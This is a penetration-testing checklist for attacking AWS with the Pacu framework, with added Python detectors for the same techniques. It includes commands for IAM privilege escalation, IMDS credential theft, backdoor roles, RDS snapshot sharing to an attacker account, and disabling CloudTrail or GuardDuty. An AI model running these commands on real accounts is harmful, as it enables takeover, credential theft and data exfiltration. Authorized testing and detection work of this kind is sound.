AWS environments are high-value targets. Misconfigured IAM roles, over-permissioned Lambda functions, exposed S3 buckets, and poorly scoped service accounts create attack surfaces that adversaries actively exploit. Pacu, the open-source AWS exploitation framework developed by Rhino Security Labs, gives penetration testers and red teamers a structured, modular approach to enumerating and exploiting these weaknesses.
This checklist walks through the complete Pacu workflow for AWS security testing, from initial setup and credential configuration through privilege escalation, persistence, and lateral movement. Every section includes real commands you can run in your engagements.
If you are serious about building hands-on cloud offensive skills, the AWS Pentesting Course at Redfox Cybersecurity Academy covers these exact techniques in a structured lab environment.
Pacu requires Python 3 and works best in a dedicated virtual environment. Start clean to avoid dependency conflicts.
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 main.py
Once Pacu launches, you will be dropped into an interactive shell. Create a new session to isolate your engagement data.
Pacu (us-east-1) > new_session redfox_aws_test
Pacu reads credentials directly from AWS profiles, environment variables, or manual input. For engagements where you have been provided access keys, use the set_keys command.
Pacu (redfox_aws_test) > set_keys
Key Alias: initial_access
Access Key ID: AKIA...
Secret Access Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Session Token (optional): leave blank if not using STS
To import credentials from an existing AWS CLI profile:
Pacu (redfox_aws_test) > import_keys profile_name
Verify the active keys and check what identity you are operating as before running any modules:
Pacu (redfox_aws_test) > whoami
Reconnaissance in AWS is not passive in the traditional sense. Every API call is logged in CloudTrail, so disciplined testers scope their enumeration carefully and document what they run.
Start by establishing the full identity context of your compromised credentials. This includes the account ID, ARN, and any attached policies.
Pacu (redfox_aws_test) > run iam__detect_honeytokens
Pacu (redfox_aws_test) > run iam__enum_users_roles_policies_groups
The iam__enum_users_roles_policies_groups module pulls all IAM users, roles, policies, and groups visible to the current principal. Pay attention to inline policies and directly attached managed policies, as these often contain over-permissioned actions that were added outside of a formal change management process.
For a targeted check on what the current user can actually do:
Pacu (redfox_aws_test) > run iam__bruteforce_permissions
This module attempts to call a broad set of AWS API actions and records which ones succeed, giving you a practical permissions map without needing to parse complex policy documents.
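Because iam__bruteforce_permissions leaves exactly this footprint in CloudTrail (many distinct API actions, most of them denied, from one principal in a short time), defenders can detect it. The Python below is an added example, not part of the original article or of Pacu, that flags any principal whose distinct denied actions inside a sliding window reach a threshold; the events, ARNs and thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Error codes that mean "call was made, permission was missing". EC2 reports
# Client.UnauthorizedOperation; most other services report AccessDenied*.
DENIED_MARKERS = ("AccessDenied", "UnauthorizedOperation")

def _ev(time, source, name, arn, error=None):
    """Build a minimal CloudTrail record (constructed test data, not a real log)."""
    ev = {"eventTime": time, "eventSource": source, "eventName": name,
          "userIdentity": {"arn": arn}}
    if error:
        ev["errorCode"] = error
    return ev

def find_permission_probing(events, window=timedelta(minutes=10), min_distinct=5):
    """Return {principal_arn: [denied actions]} for principals whose distinct
    denied API actions inside any sliding window of `window` reach min_distinct."""
    by_principal = defaultdict(list)
    for ev in events:
        if any(m in ev.get("errorCode", "") for m in DENIED_MARKERS):
            arn = ev.get("userIdentity", {}).get("arn", "unknown")
            when = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
            by_principal[arn].append((when, f"{ev['eventSource']}:{ev['eventName']}"))
    findings = {}
    for arn, calls in by_principal.items():
        calls.sort()
        start = 0
        for end in range(len(calls)):
            while calls[end][0] - calls[start][0] > window:
                start += 1  # drop denials that fell out of the window
            distinct = {action for _, action in calls[start:end + 1]}
            if len(distinct) >= min_distinct:
                findings[arn] = sorted(distinct)
                break
    return findings

PROBE = "arn:aws:iam::123456789012:user/app-deploy"  # constructed principals
ALICE = "arn:aws:iam::123456789012:user/alice"
SAMPLE_EVENTS = [  # one principal sweeps five services in seconds; one normal user hits a single denial
    _ev("2024-05-01T10:00:01Z", "ec2.amazonaws.com", "DescribeInstances", PROBE, "Client.UnauthorizedOperation"),
    _ev("2024-05-01T10:00:02Z", "s3.amazonaws.com", "ListBuckets", PROBE, "AccessDenied"),
    _ev("2024-05-01T10:00:03Z", "iam.amazonaws.com", "ListUsers", PROBE, "AccessDenied"),
    _ev("2024-05-01T10:00:04Z", "lambda.amazonaws.com", "ListFunctions20150331", PROBE, "AccessDeniedException"),
    _ev("2024-05-01T10:00:05Z", "secretsmanager.amazonaws.com", "ListSecrets", PROBE, "AccessDeniedException"),
    _ev("2024-05-01T10:00:06Z", "sts.amazonaws.com", "GetCallerIdentity", PROBE),
    _ev("2024-05-01T10:30:00Z", "s3.amazonaws.com", "GetObject", ALICE, "AccessDenied"),
]
```

Tune `window` and `min_distinct` to the noise level of the account; a single legitimate deployment job rarely produces five distinct denials in ten minutes.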
S3 misconfigurations remain one of the most common findings in AWS assessments. Use Pacu to enumerate accessible buckets and check for public access or permissive ACLs.
Pacu (redfox_aws_test) > run s3__enum_bucket_unauthenticated
Pacu (redfox_aws_test) > run s3__get_bucket_acls
Follow up by searching bucket contents for sensitive data patterns:
Pacu (redfox_aws_test) > run s3__download_bucket --bucket-name target-bucket-name
If you are working through the Redfox Cybersecurity Academy AWS Pentesting Course, you will practice these exact S3 enumeration patterns against intentionally misconfigured lab environments built to mirror real-world targets.
Pacu (redfox_aws_test) > run ec2__enum_instances
Pacu (redfox_aws_test) > run ec2__enum_security_groups
Pacu (redfox_aws_test) > run ec2__enum_elastic_ips
The EC2 enumeration modules pull instance metadata including AMI IDs, instance profiles, security group rules, and public IP associations. Look for instances using overly permissive security groups, particularly those allowing 0.0.0.0/0 ingress on SSH, RDP, or management ports.
Pacu (redfox_aws_test) > run lambda__enum
Lambda functions frequently contain hardcoded credentials, API keys, or internal service endpoints in their environment variables. The lambda__enum module pulls function configurations including those environment variables, which are a high-priority review item in every AWS assessment.
IAM privilege escalation is the core skill in AWS offensive security. Pacu automates the detection and exploitation of the most common escalation paths described by Rhino Security Labs.
Pacu (redfox_aws_test) > run iam__privesc_scan
This module checks the current principal's permissions against a comprehensive list of known escalation techniques. It will flag paths such as:
- iam:CreatePolicyVersion on a privileged policy
- iam:AttachUserPolicy to attach AdministratorAccess to yourself
- iam:PassRole combined with ec2:RunInstances
- lambda:CreateFunction combined with lambda:InvokeFunction and iam:PassRole
- sts:AssumeRole on roles with overly permissive trust policies
When the scanner identifies a viable path, it reports the specific permissions involved and the technique required to exploit them.
If the current principal has iam:CreatePolicyVersion on a policy attached to a privileged role:
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
--policy-document '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}' \
--set-as-default
This is one of the most frequently seen escalation paths in real engagements. If you have iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction:
aws lambda create-function \
--function-name privesc-test \
--runtime python3.11 \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler index.handler \
--zip-file fileb://function.zip
aws lambda invoke \
--function-name privesc-test \
--payload '{}' \
output.json
The function code itself can call sts:AssumeRole or iam:CreateAccessKey to extract credentials from the higher-privileged role.
For paths that Pacu can exploit directly:
Pacu (redfox_aws_test) > run iam__privesc_scan --scan-only
Pacu (redfox_aws_test) > run iam__privesc_scan --technique TECHNIQUE_NAME
Replace TECHNIQUE_NAME with the specific method identified by the scan, such as CreatePolicyVersion, AttachUserPolicy, or UpdateLoginProfile.
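From the defender's side, the same permission combinations can be audited from policy documents before anyone points a scanner at the account. The Python below is an added example, not Pacu code and not the article's own, that matches the escalation paths listed above against the Allow statements of a principal's policies while honouring IAM's case-insensitive wildcard matching; the policy documents are constructed.

```python
import fnmatch

# Permission sets from the list above (plus UpdateLoginProfile, named in the
# privesc_scan discussion). Every hit is a remediation item for the policy owner.
PRIVESC_PATHS = {
    "CreatePolicyVersion": {"iam:CreatePolicyVersion"},
    "AttachUserPolicy": {"iam:AttachUserPolicy"},
    "UpdateLoginProfile": {"iam:UpdateLoginProfile"},
    "PassRole+RunInstances": {"iam:PassRole", "ec2:RunInstances"},
    "PassRole+Lambda": {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
    "AssumeRole (check role trust policies)": {"sts:AssumeRole"},
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def allowed_action_patterns(policy_docs):
    """Collect Allow action patterns. Caveat: Deny statements, NotAction,
    Conditions and Resource scoping are ignored, so treat hits as leads."""
    patterns = []
    for doc in policy_docs:
        for stmt in _as_list(doc.get("Statement", [])):
            if stmt.get("Effect") == "Allow" and "Action" in stmt:
                patterns.extend(a.lower() for a in _as_list(stmt["Action"]))
    return patterns

def action_granted(action, patterns):
    # IAM action names are case-insensitive; patterns may use * and ? wildcards
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)

def find_privesc_paths(policy_docs):
    """Return the names of the PRIVESC_PATHS fully granted by the given policies."""
    patterns = allowed_action_patterns(policy_docs)
    return sorted(name for name, needed in PRIVESC_PATHS.items()
                  if all(action_granted(a, patterns) for a in needed))

# Constructed example: a CI "deploy" policy whose lambda:* wildcard, together
# with an unscoped iam:PassRole, completes the Lambda path listed above.
DEPLOY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::deploy-artifacts/*"},
    ],
}
ADMIN_POLICY = {"Version": "2012-10-17",
                "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
```

Feed it the documents returned by get-policy-version and the inline policy calls for one principal; scoping the iam:PassRole Resource to the specific roles a job may pass is the usual fix for the Lambda and EC2 paths.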
Once you have elevated access, the next objective is harvesting credentials from other services and moving laterally across the environment.
EC2 instance metadata (IMDS) is a critical source of temporary credentials in any AWS environment. From inside an EC2 instance:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
If IMDSv1 is enabled (which it still is in many environments), these calls require no authentication token. IMDSv2 requires a session token but is still exploitable from within the instance:
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
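The mitigation for the IMDS credential path above is enforcing IMDSv2 (tokens required) with a PUT response hop limit of 1, and it is worth checking fleet-wide. The Python below is an added example, not from the article or from Pacu, that audits the Reservations list returned by describe-instances and emits the real modify-instance-metadata-options command for each instance that fails; the instance data is constructed.

```python
def audit_imds(reservations, max_hop_limit=1):
    """Return (instance_id, reason) pairs for instances whose metadata service
    still serves IMDSv1 or lets extra network hops (containers) fetch tokens.
    Instances without an instance profile expose no role credentials but are
    still reported so IMDSv2 gets enforced everywhere."""
    findings = []
    for res in reservations:
        for inst in res.get("Instances", []):
            iid, opts = inst["InstanceId"], inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # IMDS switched off entirely: nothing is served
            if opts.get("HttpTokens") != "required":
                findings.append((iid, "IMDSv1 allowed: HttpTokens is not 'required'"))
            hops = opts.get("HttpPutResponseHopLimit", 1)
            if hops > max_hop_limit:
                findings.append((iid, f"HttpPutResponseHopLimit {hops} lets containers on the host reach IMDS"))
    return findings

def remediation_commands(findings):
    """One modify-instance-metadata-options call per affected instance (real AWS CLI syntax)."""
    return [f"aws ec2 modify-instance-metadata-options --instance-id {iid} "
            "--http-tokens required --http-put-response-hop-limit 1"
            for iid in sorted({iid for iid, _ in findings})]

# Constructed describe-instances output (not from a real account).
SAMPLE_RESERVATIONS = [{"Instances": [
    {"InstanceId": "i-0aaa",  # hardened
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbb",  # IMDSv1 still answers
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0ccc",  # v2 only, but reachable from containers
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0ddd",  # endpoint disabled, skipped
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
]}]

if __name__ == "__main__":
    for line in remediation_commands(audit_imds(SAMPLE_RESERVATIONS)):
        print(line)
```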
Pacu can enumerate and pull values from AWS Secrets Manager and Systems Manager Parameter Store, both of which are commonly used to store database credentials, API keys, and third-party service tokens.
Pacu (redfox_aws_test) > run secretsmanager__enum
Pacu (redfox_aws_test) > run ssm__param_enum
Secrets discovered here can enable lateral movement into databases, external SaaS platforms, or other AWS accounts referenced in the secrets values.
If you discover cross-account trust relationships during enumeration:
aws sts assume-role \
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole \
--role-session-name redfox-test-session
Feed the returned AccessKeyId, SecretAccessKey, and SessionToken into Pacu as a new key set:
Pacu (redfox_aws_test) > set_keys
Key Alias: cross_account
Access Key ID: ASIA...
Secret Access Key: xxxxxxxxxxxxxxxx
Session Token: AQoXb3...
Establishing persistence in AWS does not mean installing a rootkit. It means creating access mechanisms that survive credential rotation or the removal of the initial compromised access.
Pacu (redfox_aws_test) > run iam__backdoor_users_keys
This module creates new access keys for existing IAM users, giving the tester a second set of credentials that may go unnoticed if the defender only resets the originally compromised keys.
aws iam create-role \
--role-name BackdoorRole \
--assume-role-policy-document '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::ATTACKER_ACCOUNT_ID:root"
},
"Action": "sts:AssumeRole"
}
]
}'
aws iam attach-role-policy \
--role-name BackdoorRole \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
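A role like BackdoorRole is exactly what a periodic trust-policy audit should surface. The Python below is an added example, not the article's or Pacu's code, that walks a role's assume-role policy document and flags wildcard principals and principals from accounts outside a known-account list, noting when no Condition (such as sts:ExternalId) constrains them; the trust documents are constructed, with 999999999999 standing in for ATTACKER_ACCOUNT_ID.

```python
import re

# Account-scoped ARNs (iam and sts) carry the 12-digit account id after the
# double colon; a bare 12-digit string is also a valid account principal.
ACCOUNT_IN_ARN = re.compile(r"^arn:aws:(?:iam|sts)::(\d{12}):")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def assume_role_principals(trust_doc):
    """Yield (principal, statement) for each Allow statement granting sts:AssumeRole*."""
    for stmt in _as_list(trust_doc.get("Statement", [])):
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        if stmt.get("Effect") != "Allow" or not any(a.startswith("sts:assumerole") for a in actions):
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":
            yield "*", stmt
        else:  # Service/Federated principals are not account trust and are skipped here
            for p in _as_list(principal.get("AWS", [])):
                yield p, stmt

def audit_trust_policy(role_name, trust_doc, trusted_accounts):
    """Return (role, principal, reason) for principals outside trusted_accounts."""
    findings = []
    for p, stmt in assume_role_principals(trust_doc):
        if p == "*":
            findings.append((role_name, p, "wildcard principal: any AWS account may assume"))
            continue
        match = ACCOUNT_IN_ARN.match(p)
        account = match.group(1) if match else (p if re.fullmatch(r"\d{12}", p) else None)
        if account is None:
            findings.append((role_name, p, "unrecognised principal, review manually"))
        elif account not in trusted_accounts:
            reason = "external account"
            if "Condition" not in stmt:
                reason += ", no Condition (e.g. sts:ExternalId) limiting it"
            findings.append((role_name, p, reason))
    return findings

OUR_ACCOUNTS = {"123456789012"}  # constructed: the organization's own account ids
BACKDOOR_TRUST = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                  "Principal": {"AWS": "arn:aws:iam::999999999999:root"}}]}  # constructed attacker account
LAMBDA_TRUST = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                "Principal": {"Service": "lambda.amazonaws.com"}}]}
INTERNAL_TRUST = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                  "Principal": {"AWS": ["arn:aws:iam::123456789012:role/ci", "123456789012"]}}]}
```

Run `audit_trust_policy` over every role from list-roles (each entry carries its AssumeRolePolicyDocument); pair it with a CloudTrail alert on CreateRole and UpdateAssumeRolePolicy so new external trusts are seen when they are written, not at the next audit.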
Deploying a Lambda function that periodically creates new access keys or reports credentials to an external endpoint is a common adversary technique.
Pacu (redfox_aws_test) > run lambda__backdoor_new_roles
This Pacu module automates the deployment of a Lambda function that attaches to new role creation events and backdoors them automatically as they are created.
Data exfiltration objectives in AWS assessments typically center on S3, RDS snapshots, and EBS snapshots. Documenting what is reachable is often enough; you rarely need to transfer real data in a responsible engagement.
aws s3 ls s3://target-bucket --recursive
aws s3 cp s3://target-bucket/sensitive-file.txt ./
For reporting purposes, document the bucket name, object key, size, and last modified date rather than downloading production data where possible.
If the compromised principal has rds:ModifyDBSnapshotAttribute, they can share an existing snapshot with an external account:
aws rds modify-db-snapshot-attribute \
--db-snapshot-identifier prod-db-snapshot \
--attribute-name restore \
--values-to-add ATTACKER_ACCOUNT_ID
This technique allows exfiltration of full database contents without touching the live database instance, making it harder to detect through standard database logging.
Understanding detection evasion is essential for red team engagements that measure both offensive capability and blue team detection coverage.
Pacu (redfox_aws_test) > run cloudtrail__download_event_history
Pacu (redfox_aws_test) > run detection__disruption
The detection__disruption module includes techniques for disabling GuardDuty, stopping CloudTrail logging, and modifying CloudWatch alarms. In a responsible engagement, document the capability without executing destructive actions in production environments unless explicitly scoped.
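Both the snapshot-sharing path above and the detection__disruption actions leave distinctive CloudTrail management events, which is where a blue team should be alerting. The Python below is an added example, not part of the article or of Pacu, that triages records for logging or detection being stopped or modified and for RDS snapshots shared with accounts outside an allowlist (it also covers cluster snapshots and failed attempts, a small generalization of the text); the account IDs and records are constructed.

```python
TRUSTED_ACCOUNTS = {"123456789012"}  # constructed: accounts allowed to receive snapshots

# Control-plane calls that disable logging or detection. Names are CloudTrail
# eventName values (the API operation names) keyed by eventSource.
DISRUPTION_EVENTS = {
    "cloudtrail.amazonaws.com": {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"},
    "guardduty.amazonaws.com": {"DeleteDetector", "UpdateDetector"},
    "monitoring.amazonaws.com": {"DisableAlarmActions", "DeleteAlarms", "PutMetricAlarm"},
}
SNAPSHOT_SHARE_EVENTS = {"ModifyDBSnapshotAttribute", "ModifyDBClusterSnapshotAttribute"}

def external_snapshot_grants(event, trusted_accounts):
    """Accounts outside trusted_accounts (or 'all' = public) added by an RDS snapshot share."""
    params = event.get("requestParameters") or {}
    if (event.get("eventSource") != "rds.amazonaws.com"
            or event.get("eventName") not in SNAPSHOT_SHARE_EVENTS
            or params.get("attributeName") != "restore"):
        return []
    return [a for a in params.get("valuesToAdd") or [] if a == "all" or a not in trusted_accounts]

def triage(events, trusted_accounts=TRUSTED_ACCOUNTS):
    """Return (principal_arn, eventName, outcome, reason) for events worth an alert."""
    findings = []
    for ev in events:
        who = ev.get("userIdentity", {}).get("arn", "unknown")
        outcome = "failed" if ev.get("errorCode") else "succeeded"  # a denied StopLogging is still a signal
        if ev.get("eventName") in DISRUPTION_EVENTS.get(ev.get("eventSource"), ()):
            findings.append((who, ev["eventName"], outcome, "logging/detection disruption"))
        grants = external_snapshot_grants(ev, trusted_accounts)
        if grants:
            findings.append((who, ev["eventName"], outcome, f"snapshot shared with {grants}"))
    return findings

ACTOR = "arn:aws:iam::123456789012:user/app-deploy"  # constructed
SAMPLE_EVENTS = [  # constructed CloudTrail records, not real log data
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"name": "org-trail"}},
    {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"dBSnapshotIdentifier": "prod-db-snapshot", "attributeName": "restore", "valuesToAdd": ["999999999999"]}},
    {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"dBSnapshotIdentifier": "dev-copy", "attributeName": "restore", "valuesToAdd": ["123456789012"]}},
    {"eventSource": "guardduty.amazonaws.com", "eventName": "DeleteDetector", "userIdentity": {"arn": ACTOR},
     "errorCode": "AccessDeniedException"},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances", "userIdentity": {"arn": ACTOR}},
]
```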
Pacu allows you to run modules with --dry-run where supported, and you can review the specific API calls each module makes before executing:
Pacu (redfox_aws_test) > run module_name --dry-run
Pacu (redfox_aws_test) > help module_name
Spacing out API calls, avoiding wildcard resource enumeration, and operating from IP addresses consistent with legitimate usage are standard operational security practices for covert engagements.
The summary below lists the key Pacu modules covered in this checklist by phase.
Setup and credentials: new_session, set_keys, import_keys, whoami
Reconnaissance: iam__detect_honeytokens, iam__enum_users_roles_policies_groups, iam__bruteforce_permissions, s3__enum_bucket_unauthenticated, s3__get_bucket_acls, s3__download_bucket, ec2__enum_instances, ec2__enum_security_groups, ec2__enum_elastic_ips, lambda__enum
Privilege escalation: iam__privesc_scan
Credential harvesting and lateral movement: secretsmanager__enum, ssm__param_enum
Persistence: iam__backdoor_users_keys, lambda__backdoor_new_roles
Detection evasion: cloudtrail__download_event_history, detection__disruption
AWS penetration testing with Pacu is a disciplined, structured process. The framework gives you modular coverage across the full attack lifecycle, from initial enumeration and IAM privilege escalation through persistence and data exfiltration simulation. Every module maps to a real-world technique that adversaries use against production AWS environments.
The most impactful findings in AWS assessments come from IAM misconfigurations. Understanding the privilege escalation paths Pacu detects, and being able to explain them clearly in a report, separates a competent AWS tester from a strong one.
If you want to build this skill set in a structured lab environment where you can run these exact modules safely against intentionally vulnerable AWS infrastructure, the AWS Pentesting Course at Redfox Cybersecurity Academy is designed precisely for that. The course covers IAM privilege escalation, cross-account attacks, Lambda exploitation, and full red team workflows against realistic AWS environments.